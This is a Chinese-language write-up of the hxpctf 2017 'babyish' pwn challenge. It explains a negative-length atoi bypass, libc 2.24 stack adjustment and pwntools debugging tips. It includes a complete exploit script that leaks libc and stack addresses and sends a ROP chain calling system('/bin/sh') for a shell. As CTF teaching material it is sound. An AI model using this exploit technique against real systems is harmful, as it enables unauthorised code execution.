pwntools使用技巧以及较新版本32位libc下的ROP

hxpctf 2017 pwn100 babyish

题目比较简单，但是学到了几个知识点，记录一下。

简要分析

main.png

• checksec

    vccxx1337@vccxx1337-PC:~/Desktop/ctfgame/hxpctf/babyish$ checksec vuln
    [*] '/home/vccxx1337/Desktop/ctfgame/hxpctf/babyish/vuln'
            Arch:     i386-32-little
            RELRO:    Partial RELRO
            Stack:    No canary found
            NX:       NX enabled
            PIE:      No PIE (0x8048000)
  

  开了栈不可执行，所以用栈溢出来执行shellcode没戏；
  审查函数代码，发现greet函数中可以泄露栈中信息，动态调试发现栈上有一个libc地址可以泄露，因此考虑ROP

• atoi

  之前一直没做出来就是卡在不知道怎么溢出。。多谢USTC的dalao指导

  main函数中调用的num()函数读入我们的输入input，返回atoi(input)的值给main函数的局部变量len，之后将len和63比较，限制len小于63。

  如果输入一个正数是无法溢出的，因为len作为后面read的参数限制了你的输入长度。但是如果我们输入一个负数比如-1，则可以通过这一限制，而-1在内存中存的是补码0xFFFFFFFF,这个数作为read的参数，就允许我们覆盖任意长的堆栈数据。

• libc 的堆栈调整机制

adjustStack.png

观察main函数发现这个main函数的返回和之前见过的的main函数返回不太一样：

以前见过的返回普遍是直接esp-0x??然后就ret了
这个程序的main函数返回使用栈上存储的数据来调整ret之前的esp的值，也就是说，如果直接ROP，我们的junk数据中必须在ebp-0x0c这个地方布置一个栈地址，这个栈地址必须在我们可覆盖的范围内（也就是大于main函数中buf的地址）。

这样的调整机制在较新的libc中都有(这题的libc版本是2.24),这种机制的好处在于要求攻击者在rop时还泄露一个栈地址，提高了攻击难度。

很巧的是之前泄露libc地址的时候栈中就有一个符合上述条件的栈地址，因此通过在栈上布置好需要的数据，就可以开心的ROP啦。

显示libc信息的技巧

只需要

sudo chmod +x libc.so.6
./libc.so.6

即可。

libc_info.png

pwntools技巧

看了dalao的pwn脚本学到了pwntools的使用姿势：

• env参数

    io = process("./vuln",env={'LD_PRELOAD':'./libc.so.6'}) 
  

  通过在process后面加参数env来指定程序使用的libc，这样就可以让程序运行在远程靶机上大致一样的环境下。对给了libc的题来说，再也不用先用自己的libc调试，成功后再转换为远程libc的地址了。

• 直接从libc中加载符号偏移

    libc = ELF("./libc.so.6")
    setbuffer_symbol = libc.symbols["setbuffer"]
    system_symbol = libc.symbols["system"]
  

• gdb调试脚本

  调payload的时候以前总是要一步步运行脚本到发送payload前的语句，现在只需要在发送payload前加上这一句：

    gdb.attach(io)
  

  将会等待gdb的attach，加上pid的显示会更方便些

    pid = proc.pidof(io)
    print pid
    gdb.attach(io)  
  

• 设置输出调试信息

    context.log_level='debug'
  

  加上这句之后，pwntools的返回信息更加直观详细:

debugInfo.png

攻击脚本

from pwn import *
import time

#设置pwntools
io = process("./vuln",env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF("./libc.so.6")
context.log_level='debug'
#io =remote('35.198.98.140',45067)

#获取所给libc的符号偏移
setbuffer_symbol = libc.symbols["setbuffer"]
system_symbol = libc.symbols["system"]

#泄露内存中栈地址和libc地址
io.recv()
io.send("1"*16)
io.recvuntil("1"*16)
data = io.recv()[:12]
setbuff_addr = int(data[-4:][::-1].encode("hex"),16) - 0xB
stack_addr = int(data[0:4][::-1].encode("hex"),16)
system_addr =  system_symbol - setbuffer_symbol + setbuff_addr
binsh_symbol = 0x0015CD48
binsh_addr = binsh_symbol - system_symbol + system_addr
print "[+] leaked setbuff addr :" + hex(setbuff_addr)
print "[+] calced system_addr :" +hex(system_addr)
print "[+] leaked stack addr:" + hex(stack_addr)
print "[+] calced binsh addr:" + hex(binsh_addr)

#发送ROP链
sleep(3)
io.sendline("-1")
payload = "j"*0x50 + p32(stack_addr) + 3*"junk"+p32(system_addr) + p32(0x080486EF) + p32(binsh_addr)
pid = proc.pidof(io)[0]
print pid
gdb.attach(io)
io.send(payload)
io.interactive()

注意时延问题。。。直接连远程的是后我是用ipython一行一行运行脚本才拿到的shell，修改sleep的秒数有时候好使。

flag.png